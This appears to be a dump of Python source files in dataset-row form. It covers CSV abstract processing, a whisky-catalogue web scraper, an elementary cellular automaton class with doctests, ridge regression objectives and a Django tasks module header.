                long_forms_updated.append(long_form)
        return replaced_abstract, long_forms_updated, span_updated
    def single_run(self, filename: str) -> None:
        """
        Load one CSV of abstracts, replace long forms by short forms and write
        the results (plus the per-long-form counts file) to ``self.output_path``.
        Each output row gets a unique key built from a random batch key and the
        row index.

        :param filename: Name of the input CSV inside ``self.input_path``.
        """
        from ast import literal_eval
        # literal_eval only evaluates Python literals, unlike ``eval`` which
        # would execute arbitrary expressions embedded in the CSV.
        df_abstracts = pd.read_csv(
            os.path.join(self.input_path, filename),
            converters={'long_forms': literal_eval, 'span': literal_eval}
        )
        result_rows = []
        batch_key: str = self.generate_key()
        for i, row in df_abstracts.iterrows():
            # Skip rows without long forms and abstracts that are too short.
            if row['long_forms'] != [] and len(row['abstract']) > self.length_abstract:
                replaced_abstract, long_forms_updated, span_updated = self.replace_abstract(
                    row['abstract'], row['long_forms'], row['span']
                )
                # Keep only rows in which at least one replacement happened.
                if long_forms_updated != []:
                    unique_key: str = batch_key + "_" + str(i)
                    # Track, per long form, how often and where it was replaced.
                    for long_form in long_forms_updated:
                        self.long_form_counts[long_form] += 1
                        self.long_form_loc[long_form].append(unique_key)
                    result_rows.append({
                        'long_forms': long_forms_updated, 'span_short_form': span_updated,
                        'replaced_abstract': replaced_abstract, 'unique_key': unique_key
                    })
        # Build the frame once: DataFrame.append in a loop is quadratic and
        # was removed in pandas 2.0.
        df_results = pd.DataFrame(
            result_rows,
            columns=['long_forms', 'span_short_form', 'replaced_abstract', 'unique_key']
        )
        # Export df to csv
        new_filename: str = "{}.csv".format(batch_key)
        df_results.to_csv(os.path.join(self.output_path, new_filename), index=False)
        # Export dictionary to csv
        df_counts = pd.DataFrame(
            list(self.long_form_counts.items()), columns=['long_form', 'counts']
        )
        df_counts['unique_key'] = list(self.long_form_loc.values())
        df_counts.to_csv(os.path.join(self.output_path, "counts.csv"), index=False)
from bs4 import BeautifulSoup
import requests
from typing import List, Dict
import json
import time
def get_all_whiskys(urls: List[str], headers: Dict[str, str]) -> Dict[str, str]:
"""Function to scrape name and further details link from each row of whisky from every page on each url in a list of urls from masterofmalt.com
Args:
urls (List[str]): urls list
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: returns a dict of whisky name and link to full page of details
"""
# Initialise empty dict
links: Dict[str, str] = {}
# Begin loop over url list
for url in urls:
print(f"Starting {url}")
# Initialise page_count variable
page_count: int = 1
# Start while loop to go over every page from each url
while True:
# Start at page 1 and go till end
if page_count >= 1:
print(f"Processing page {page_count}...")
# Beautifulsoup4 request url and soup init
req = requests.get(f"{url}/{page_count}", headers)
soup = BeautifulSoup(req.content, 'html.parser')
# Test to see if page count has been exceeded
try:
content = soup.find("div", id="productBoxWideContainer")
except AttributeError:
break
# Test to see if page count has been exceeded
try:
rows = list(content.find_all(
"div", class_="boxBgr product-box-wide h-gutter js-product-box-wide"))
except AttributeError:
break
# If page_count is within total pages, loop over rows and add
# title of whisky and link to more details page to dict
for row in rows:
query = row.find("h3")
h3 = query.get_text()
link = query.find("a").get('href')
links[h3]: str = link
print(f"Processed page {page_count}!")
# Increment page_count
page_count += 1
print(f"Finished {url}")
# Return dict of whisky titles and links
return links
def scrape_each_whisky(get_all_whiskys_data: Dict[str, str], headers: Dict[str, str]) -> Dict[str, str]:
"""Uses the get_all_whiskys() data to open links and scrape details on each whisky to build a dict.
Args:
get_all_whiskys_data (Dict[str, str]): result from get_all_whiskys()
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: scraped whisky data for each whisky in get_all_whiskys_data and errors
"""
# Initialise empty dicts for return
scraped_data: Dict[str, str] = {}
errors: Dict[str, str] = {}
count: int = 1
total: int = len(get_all_whiskys_data)
# Begin loop over passed data
for whisky in get_all_whiskys_data:
if whisky in scraped_data:
print(f"{whisky} already exists")
else:
try:
print(f"[{count}/{total}] - Scraping {whisky} info...")
req = requests.get(
f"{get_all_whiskys_data[whisky]}", headers)
soup: BeautifulSoup = BeautifulSoup(req.content, 'html.parser')
title: str = soup.find(
"h1", id='ContentPlaceHolder1_pageH1').get_text()
initial_image = soup.find("div", id='imgProductBigDiv').find(
"div", class_='productImageWrap').find("img").get("src")
image: str = "".join(initial_image[2:])
# Attempt to get Varietal (Country)
varietal: str = detailed_data(soup, "Country")
# Attempt to get Region
region: str = detailed_data(soup, "Region")
# Attempt to get Brand
brand: str = detailed_data(soup, "Distillery")
# Attempt to get Age
age: str = detailed_data(soup, "YearsMatured")
# Attempt to get Style
style: str = detailed_data(soup, "Style")
# Attempt to get Alcohol Percentage
alcohol_percentage: str = detailed_data(soup, "Alcohol")
scraped_data[title] = {
"Country": "",
"Image": image,
"Varietal": varietal,
"Region": region,
"Whisky Style": style,
"Brand Name": brand,
"Name": title,
"Age": age,
"Alcohol Volume (%)": alcohol_percentage,
"Price ($ per bottle)": "",
"Peated (Y/N)": "",
"Rating ( /10)": ""}
# print(data)
print(f"Scraped {whisky}!")
except AttributeError:
print(f"Error on: {whisky}")
errors[whisky] = get_all_whiskys_data[whisky]
continue
count += 1
return {"scraped_data": scraped_data, "errors": errors}
def detailed_data(soup: BeautifulSoup, url_end: str) -> str:
"""Helper function for scrape_each_whisky() to return either one of three possible values.
Args:
soup (BeautifulSoup): initialised BeautifulSoup instance
url_end (str): the suffix of the url to identify element
Returns:
str: value of element or empty string
"""
result: str = ""
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl00_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
# Attempt to get alternative id value
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl01_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
return result
return result | web-scraper/src/scraping_functions.py | from bs4 import BeautifulSoup
import requests
from typing import List, Dict
import json
import time
def get_all_whiskys(urls: List[str], headers: Dict[str, str]) -> Dict[str, str]:
"""Function to scrape name and further details link from each row of whisky from every page on each url in a list of urls from masterofmalt.com
Args:
urls (List[str]): urls list
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: returns a dict of whisky name and link to full page of details
"""
# Initialise empty dict
links: Dict[str, str] = {}
# Begin loop over url list
for url in urls:
print(f"Starting {url}")
# Initialise page_count variable
page_count: int = 1
# Start while loop to go over every page from each url
while True:
# Start at page 1 and go till end
if page_count >= 1:
print(f"Processing page {page_count}...")
# Beautifulsoup4 request url and soup init
req = requests.get(f"{url}/{page_count}", headers)
soup = BeautifulSoup(req.content, 'html.parser')
# Test to see if page count has been exceeded
try:
content = soup.find("div", id="productBoxWideContainer")
except AttributeError:
break
# Test to see if page count has been exceeded
try:
rows = list(content.find_all(
"div", class_="boxBgr product-box-wide h-gutter js-product-box-wide"))
except AttributeError:
break
# If page_count is within total pages, loop over rows and add
# title of whisky and link to more details page to dict
for row in rows:
query = row.find("h3")
h3 = query.get_text()
link = query.find("a").get('href')
links[h3]: str = link
print(f"Processed page {page_count}!")
# Increment page_count
page_count += 1
print(f"Finished {url}")
# Return dict of whisky titles and links
return links
def scrape_each_whisky(get_all_whiskys_data: Dict[str, str], headers: Dict[str, str]) -> Dict[str, str]:
"""Uses the get_all_whiskys() data to open links and scrape details on each whisky to build a dict.
Args:
get_all_whiskys_data (Dict[str, str]): result from get_all_whiskys()
headers (Dict[str, str]): necessary Beautifulsoup4 headers
Returns:
dict: scraped whisky data for each whisky in get_all_whiskys_data and errors
"""
# Initialise empty dicts for return
scraped_data: Dict[str, str] = {}
errors: Dict[str, str] = {}
count: int = 1
total: int = len(get_all_whiskys_data)
# Begin loop over passed data
for whisky in get_all_whiskys_data:
if whisky in scraped_data:
print(f"{whisky} already exists")
else:
try:
print(f"[{count}/{total}] - Scraping {whisky} info...")
req = requests.get(
f"{get_all_whiskys_data[whisky]}", headers)
soup: BeautifulSoup = BeautifulSoup(req.content, 'html.parser')
title: str = soup.find(
"h1", id='ContentPlaceHolder1_pageH1').get_text()
initial_image = soup.find("div", id='imgProductBigDiv').find(
"div", class_='productImageWrap').find("img").get("src")
image: str = "".join(initial_image[2:])
# Attempt to get Varietal (Country)
varietal: str = detailed_data(soup, "Country")
# Attempt to get Region
region: str = detailed_data(soup, "Region")
# Attempt to get Brand
brand: str = detailed_data(soup, "Distillery")
# Attempt to get Age
age: str = detailed_data(soup, "YearsMatured")
# Attempt to get Style
style: str = detailed_data(soup, "Style")
# Attempt to get Alcohol Percentage
alcohol_percentage: str = detailed_data(soup, "Alcohol")
scraped_data[title] = {
"Country": "",
"Image": image,
"Varietal": varietal,
"Region": region,
"Whisky Style": style,
"Brand Name": brand,
"Name": title,
"Age": age,
"Alcohol Volume (%)": alcohol_percentage,
"Price ($ per bottle)": "",
"Peated (Y/N)": "",
"Rating ( /10)": ""}
# print(data)
print(f"Scraped {whisky}!")
except AttributeError:
print(f"Error on: {whisky}")
errors[whisky] = get_all_whiskys_data[whisky]
continue
count += 1
return {"scraped_data": scraped_data, "errors": errors}
def detailed_data(soup: BeautifulSoup, url_end: str) -> str:
"""Helper function for scrape_each_whisky() to return either one of three possible values.
Args:
soup (BeautifulSoup): initialised BeautifulSoup instance
url_end (str): the suffix of the url to identify element
Returns:
str: value of element or empty string
"""
result: str = ""
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl00_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
# Attempt to get alternative id value
try:
result = soup.find("div", id=f'ContentPlaceHolder1_ctl00_ctl01_wd{url_end}').find(
"span", class_='kv-val').find("a").get_text()
except AttributeError:
return result
return result | 0.721351 | 0.289557 |
import numpy as np
from .network import BooleanNetwork
class ECA(BooleanNetwork):
"""
ECA is a class to represent elementary cellular automaton rules. Each ECA
contains an 8-bit integral member variable ``code`` representing the
Wolfram code for the ECA rule and a set of boundary conditions which is
either ``None``, signifying periodic boundary conditions, or a pair of
cell states signifying fixed, open boundary conditions.
"""
def __init__(self, code, size, boundary=None):
"""
Construct an elementary cellular automaton rule.
.. rubric:: Examples
.. doctest:: automata
>>> ca = ECA(30, 5)
>>> ca.code
30
>>> ca.size
5
>>> ca.boundary
>>> ca = ECA(30, 5, boundary=(0,0))
>>> ca.boundary
(0, 0)
:param code: the Wolfram code for the ECA
:type code: int
:param size: the size of the ECA's lattice
:type size: int
:param boundary: the boundary conditions for the CA
:type boundary: tuple or None
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
super(ECA, self).__init__(size)
self.code = code
self.boundary = boundary
@property
def code(self):
"""
The Wolfram code of the elementary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30, 5)
>>> eca.code
30
>>> eca.code = 45
>>> eca.code
45
>>> eca.code = 256
Traceback (most recent call last):
...
ValueError: invalid ECA code
:type: int
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
"""
return self.__code
@code.setter
def code(self, code):
if not isinstance(code, int):
raise TypeError("ECA code is not an int")
if 255 < code or code < 0:
raise ValueError("invalid ECA code")
self.__code = code
@property
def size(self):
return self._size
@size.setter
def size(self, size):
if not isinstance(size, int):
raise TypeError("ECA size is not an int")
if size < 1:
raise ValueError("ECA size is negative")
self._size = size
self._volume = 2**size
self._shape = [2] * size
@property
def boundary(self):
"""
The boundary conditions of the elemenary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30)
>>> eca.boundary
>>> eca.boundary = (0,1)
>>> eca.boundary
(0, 1)
>>> eca.boundary = None
>>> eca.boundary
>>> eca.boundary = [0,1]
Traceback (most recent call last):
...
TypeError: ECA boundary are neither None nor a tuple
:type: ``None`` or tuple
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
return self.__boundary
@boundary.setter
def boundary(self, boundary):
if boundary and not isinstance(boundary, tuple):
raise TypeError("ECA boundary are neither None nor a tuple")
if boundary:
if len(boundary) != 2:
raise ValueError("invalid ECA boundary conditions")
for x in boundary:
if x != 0 and x != 1:
raise ValueError("invalid ECA boundary value")
self.__boundary = boundary
def _unsafe_update(self, lattice, index=None, pin=None, values=None):
"""
Update the state of the ``lattice``, in place, without
checking the validity of the arguments.
.. rubric:: Basic Use:
.. doctest:: automata
>>> ca = ECA(30)
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs)
[0, 1, 1, 1, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update([0,0,1,0,0])
[1, 1, 1, 1, 1]
.. rubric:: Single-Node Update:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, index=1)
[0, 1, 1, 0, 0]
>>> xs
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, index=-1)
[0, 1, 1, 0, 1]
.. rubric:: State Pinning:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, pin=[-2])
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, pin=[4])
[0, 1, 0, 1, 0]
.. rubric:: Value Fixing:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, values={0:1,-2:0})
[1, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> xs = [1,1,1,0,0]
>>> ca._unsafe_update(xs, values={1:0,-1:0})
[0, 0, 0, 1, 0]
:param lattice: the one-dimensional sequence of states
:type lattice: sequence
:param index: the index to update (or None)
:param pin: a sequence of indicies to pin (or None)
:param values: a dictionary of index-value pairs to fix after update
:returns: the updated lattice
"""
pin_states = pin is not None and pin != []
if self.boundary:
left = self.__boundary[0]
right = self.__boundary[1]
else:
left = lattice[-1]
right = lattice[0]
code = self.code
if index is None:
if pin_states:
pinned = np.asarray(lattice)[pin]
temp = 2 * left + lattice[0]
for i in range(1, len(lattice)):
temp = 7 & (2 * temp + lattice[i])
lattice[i - 1] = 1 & (code >> temp)
temp = 7 & (2 * temp + right)
lattice[-1] = 1 & (code >> temp)
if pin_states:
for (j, i) in enumerate(pin):
lattice[i] = pinned[j]
else:
if index < 0:
index += len(lattice)
if index == 0:
temp = left
else:
temp = lattice[index - 1]
temp = 2 * temp + lattice[index]
if index + 1 == len(lattice):
temp = 2 * temp + right
else:
temp = 2 * temp + lattice[index + 1]
lattice[index] = 1 & (code >> (7 & temp))
if values is not None:
for key in values:
lattice[key] = values[key]
return lattice
def neighbors_in(self, index, *args, **kwargs):
"""
Return the set of all incoming neighbor nodes.
In the cases of the lattices having fixed boundary conditions, the
left boundary, being on the left of the leftmost index 0, has an index
of -1, while the right boundary's index is the size+1. The full state
of the lattices and the boundaries is equavolent to: `[cell0, cell1,
..., cellN, right_boundary, left_boundary]` if it is ever presented as
a single list in Python.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point toward the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_in(1, size=3)
{0, 1, 2}
>>> net.neighbors_in(2, size=3)
{0, 1, 2}
>>> net.boundary = (1,1)
>>> net.neighbors_in(2, size=3)
{1, 2, 3}
>>> net.neighbors_in(0, 3)
{0, 1, -1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_in(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0 and self.boundary is None:
left = size - 1
if right > size - 1 and self.boundary is None:
right = 0
return {left, index, right}
def neighbors_out(self, index, *args, **kwargs):
"""
Return the set of all outgoing neighbor nodes.
Fixed boundaries are excluded as they are not affected by internal
states.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point from the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_out(1, 3)
{0, 1, 2}
>>> net.neighbors_out(2, 3)
{0, 1, 2}
>>> net.boundary = (1, 1)
>>> net.neighbors_out(2, 3)
{1, 2}
>>> net.neighbors_out(0, 3)
{0, 1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_out(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0:
left = size - 1 if self.boundary is None else 0
if right > size - 1:
right = 0 if self.boundary is None else size - 1
return {left, index, right}
def to_networkx_graph(self, *args, **kwargs):
kwargs['code'] = self.code
kwargs['boundary'] = self.boundary
return super(ECA, self).to_networkx_graph(*args, **kwargs)
BooleanNetwork.register(ECA) | neet/boolean/eca.py | import numpy as np
from .network import BooleanNetwork
class ECA(BooleanNetwork):
"""
ECA is a class to represent elementary cellular automaton rules. Each ECA
contains an 8-bit integral member variable ``code`` representing the
Wolfram code for the ECA rule and a set of boundary conditions which is
either ``None``, signifying periodic boundary conditions, or a pair of
cell states signifying fixed, open boundary conditions.
"""
def __init__(self, code, size, boundary=None):
"""
Construct an elementary cellular automaton rule.
.. rubric:: Examples
.. doctest:: automata
>>> ca = ECA(30, 5)
>>> ca.code
30
>>> ca.size
5
>>> ca.boundary
>>> ca = ECA(30, 5, boundary=(0,0))
>>> ca.boundary
(0, 0)
:param code: the Wolfram code for the ECA
:type code: int
:param size: the size of the ECA's lattice
:type size: int
:param boundary: the boundary conditions for the CA
:type boundary: tuple or None
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
super(ECA, self).__init__(size)
self.code = code
self.boundary = boundary
@property
def code(self):
"""
The Wolfram code of the elementary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30, 5)
>>> eca.code
30
>>> eca.code = 45
>>> eca.code
45
>>> eca.code = 256
Traceback (most recent call last):
...
ValueError: invalid ECA code
:type: int
:raises TypeError: if ``code`` is not an instance of int
:raises ValueError: if ``code`` is not in :math:`\\{0,1,\\ldots,255\\}`
"""
return self.__code
@code.setter
def code(self, code):
if not isinstance(code, int):
raise TypeError("ECA code is not an int")
if 255 < code or code < 0:
raise ValueError("invalid ECA code")
self.__code = code
@property
def size(self):
return self._size
@size.setter
def size(self, size):
if not isinstance(size, int):
raise TypeError("ECA size is not an int")
if size < 1:
raise ValueError("ECA size is negative")
self._size = size
self._volume = 2**size
self._shape = [2] * size
@property
def boundary(self):
"""
The boundary conditions of the elemenary cellular automaton
.. rubric:: Examples
.. doctest:: automata
>>> eca = ECA(30)
>>> eca.boundary
>>> eca.boundary = (0,1)
>>> eca.boundary
(0, 1)
>>> eca.boundary = None
>>> eca.boundary
>>> eca.boundary = [0,1]
Traceback (most recent call last):
...
TypeError: ECA boundary are neither None nor a tuple
:type: ``None`` or tuple
:raises TypeError: if ``boundary`` is neither ``None`` or an instance of tuple
:raises ValueError: if ``boundary`` is a neither ``None`` or a pair of binary states
"""
return self.__boundary
@boundary.setter
def boundary(self, boundary):
if boundary and not isinstance(boundary, tuple):
raise TypeError("ECA boundary are neither None nor a tuple")
if boundary:
if len(boundary) != 2:
raise ValueError("invalid ECA boundary conditions")
for x in boundary:
if x != 0 and x != 1:
raise ValueError("invalid ECA boundary value")
self.__boundary = boundary
def _unsafe_update(self, lattice, index=None, pin=None, values=None):
"""
Update the state of the ``lattice``, in place, without
checking the validity of the arguments.
.. rubric:: Basic Use:
.. doctest:: automata
>>> ca = ECA(30)
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs)
[0, 1, 1, 1, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update([0,0,1,0,0])
[1, 1, 1, 1, 1]
.. rubric:: Single-Node Update:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, index=1)
[0, 1, 1, 0, 0]
>>> xs
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, index=-1)
[0, 1, 1, 0, 1]
.. rubric:: State Pinning:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, pin=[-2])
[0, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> ca._unsafe_update(xs, pin=[4])
[0, 1, 0, 1, 0]
.. rubric:: Value Fixing:
.. doctest:: automata
>>> ca.boundary = None
>>> xs = [0,0,1,0,0]
>>> ca._unsafe_update(xs, values={0:1,-2:0})
[1, 1, 1, 0, 0]
>>> ca.boundary = (1,1)
>>> xs = [1,1,1,0,0]
>>> ca._unsafe_update(xs, values={1:0,-1:0})
[0, 0, 0, 1, 0]
:param lattice: the one-dimensional sequence of states
:type lattice: sequence
:param index: the index to update (or None)
:param pin: a sequence of indicies to pin (or None)
:param values: a dictionary of index-value pairs to fix after update
:returns: the updated lattice
"""
pin_states = pin is not None and pin != []
if self.boundary:
left = self.__boundary[0]
right = self.__boundary[1]
else:
left = lattice[-1]
right = lattice[0]
code = self.code
if index is None:
if pin_states:
pinned = np.asarray(lattice)[pin]
temp = 2 * left + lattice[0]
for i in range(1, len(lattice)):
temp = 7 & (2 * temp + lattice[i])
lattice[i - 1] = 1 & (code >> temp)
temp = 7 & (2 * temp + right)
lattice[-1] = 1 & (code >> temp)
if pin_states:
for (j, i) in enumerate(pin):
lattice[i] = pinned[j]
else:
if index < 0:
index += len(lattice)
if index == 0:
temp = left
else:
temp = lattice[index - 1]
temp = 2 * temp + lattice[index]
if index + 1 == len(lattice):
temp = 2 * temp + right
else:
temp = 2 * temp + lattice[index + 1]
lattice[index] = 1 & (code >> (7 & temp))
if values is not None:
for key in values:
lattice[key] = values[key]
return lattice
def neighbors_in(self, index, *args, **kwargs):
"""
Return the set of all incoming neighbor nodes.
In the cases of the lattices having fixed boundary conditions, the
left boundary, being on the left of the leftmost index 0, has an index
of -1, while the right boundary's index is the size+1. The full state
of the lattices and the boundaries is equavolent to: `[cell0, cell1,
..., cellN, right_boundary, left_boundary]` if it is ever presented as
a single list in Python.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point toward the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_in(1, size=3)
{0, 1, 2}
>>> net.neighbors_in(2, size=3)
{0, 1, 2}
>>> net.boundary = (1,1)
>>> net.neighbors_in(2, size=3)
{1, 2, 3}
>>> net.neighbors_in(0, 3)
{0, 1, -1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_in(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0 and self.boundary is None:
left = size - 1
if right > size - 1 and self.boundary is None:
right = 0
return {left, index, right}
def neighbors_out(self, index, *args, **kwargs):
"""
Return the set of all outgoing neighbor nodes.
Fixed boundaries are excluded as they are not affected by internal
states.
:param index: node index
:param size: size of ECA
:returns: the set of all node indices which point from the index node
:raises ValueError: if `index < 0 or index > n - 1`
.. rubric:: Basic Use:
.. doctest:: automata
>>> net = ECA(30)
>>> net.neighbors_out(1, 3)
{0, 1, 2}
>>> net.neighbors_out(2, 3)
{0, 1, 2}
>>> net.boundary = (1, 1)
>>> net.neighbors_out(2, 3)
{1, 2}
>>> net.neighbors_out(0, 3)
{0, 1}
.. rubric:: Erroneous Usage:
.. doctest:: automata
>>> net = ECA(30,boundary=(1, 1))
>>> net.neighbors_out(5, 3)
Traceback (most recent call last):
...
ValueError: index must be a non-negative integer less than size
"""
if not isinstance(index, int):
raise TypeError("index must be a non-negative integer")
size = self.size
if index < 0 or index > size - 1:
msg = "index must be a non-negative integer less than size"
raise ValueError(msg)
left, right = index - 1, index + 1
if left < 0:
left = size - 1 if self.boundary is None else 0
if right > size - 1:
right = 0 if self.boundary is None else size - 1
return {left, index, right}
def to_networkx_graph(self, *args, **kwargs):
kwargs['code'] = self.code
kwargs['boundary'] = self.boundary
return super(ECA, self).to_networkx_graph(*args, **kwargs)
BooleanNetwork.register(ECA) | 0.887507 | 0.517266 |
import torch
from objective.base import Objective
from utils import assert_true
class Ridge(Objective):
def _validate_inputs(self, w, x, y):
assert_true(w.dim() == 2,
"Input w should be 2D")
assert_true(w.size(1) == 1,
"Ridge regression can only perform regression (size 1 output)")
assert_true(x.dim() == 2,
"Input datapoint should be 2D")
assert_true(y.dim() == 1,
"Input label should be 1D")
assert_true(x.size(0) == y.size(0),
"Input datapoint and label should contain the same number of samples")
class Ridge_ClosedForm(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
obj = a + b.squeeze()
# TODO: compute close form solution
atmp = torch.inverse(torch.mm(x.t(),x)*2/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),x)/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),y.unsqueeze(-1)))
sol = torch.mm(atmp,torch.mm(x.t(),y.unsqueeze(-1))*2/x.size()[0])
print(sol)
return {'obj': obj, 'sol': sol}
class Ridge_Gradient(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
#print(torch.mm(x,w).squeeze(-1))
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
#print(error)
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
#print(torch.mm(w.t(),w))
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
#print(b)
obj = a +b.squeeze()
# TODO: compute close form solution
an = torch.mm((2/x.size()[0])*x.t(),(torch.mm(x,w)-y.unsqueeze(-1)))
a2 = self.hparams.mu*w
#print(an)
#print(a2)
dw = (an + a2)
return {'obj': obj, 'dw': dw} | optimization/prac1/objective/ridge.py | import torch
from objective.base import Objective
from utils import assert_true
class Ridge(Objective):
def _validate_inputs(self, w, x, y):
assert_true(w.dim() == 2,
"Input w should be 2D")
assert_true(w.size(1) == 1,
"Ridge regression can only perform regression (size 1 output)")
assert_true(x.dim() == 2,
"Input datapoint should be 2D")
assert_true(y.dim() == 1,
"Input label should be 1D")
assert_true(x.size(0) == y.size(0),
"Input datapoint and label should contain the same number of samples")
class Ridge_ClosedForm(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
obj = a + b.squeeze()
# TODO: compute close form solution
atmp = torch.inverse(torch.mm(x.t(),x)*2/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),x)/x.size()[0] + self.hparams.mu*torch.eye(w.size()[0],w.size()[0]))
#print(torch.mm(x.t(),y.unsqueeze(-1)))
sol = torch.mm(atmp,torch.mm(x.t(),y.unsqueeze(-1))*2/x.size()[0])
print(sol)
return {'obj': obj, 'sol': sol}
class Ridge_Gradient(Ridge):
def task_error(self, w, x, y):
self._validate_inputs(w, x, y)
#print(torch.mm(x,w).squeeze(-1))
# TODO: Compute mean squared error
error = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
#print(error)
return error
def oracle(self, w, x, y):
self._validate_inputs(w, x, y)
# TODO: Compute objective value
#print(torch.mm(w.t(),w))
a = ((torch.mm(x,w).squeeze(-1) - y)**2).sum()/x.size()[0]
b = torch.mm(w.t(),w).squeeze(-1)*(self.hparams.mu)/2
#print(b)
obj = a +b.squeeze()
# TODO: compute close form solution
an = torch.mm((2/x.size()[0])*x.t(),(torch.mm(x,w)-y.unsqueeze(-1)))
a2 = self.hparams.mu*w
#print(an)
#print(a2)
dw = (an + a2)
return {'obj': obj, 'dw': dw} | 0.399343 | 0.704732 |
"""tasks.py: Django data_replication"""
import logging
from celery import shared_task
from .backends.base import ImproperlyConfiguredException
from .backends.mongo import MongoRequest
from .backends.splunk import SplunkRequest
__author__ = '<NAME>'
__date__ = '9/26/17 10:12'
__copyright__ = 'Copyright 2017 IC Manage. All rights reserved.'
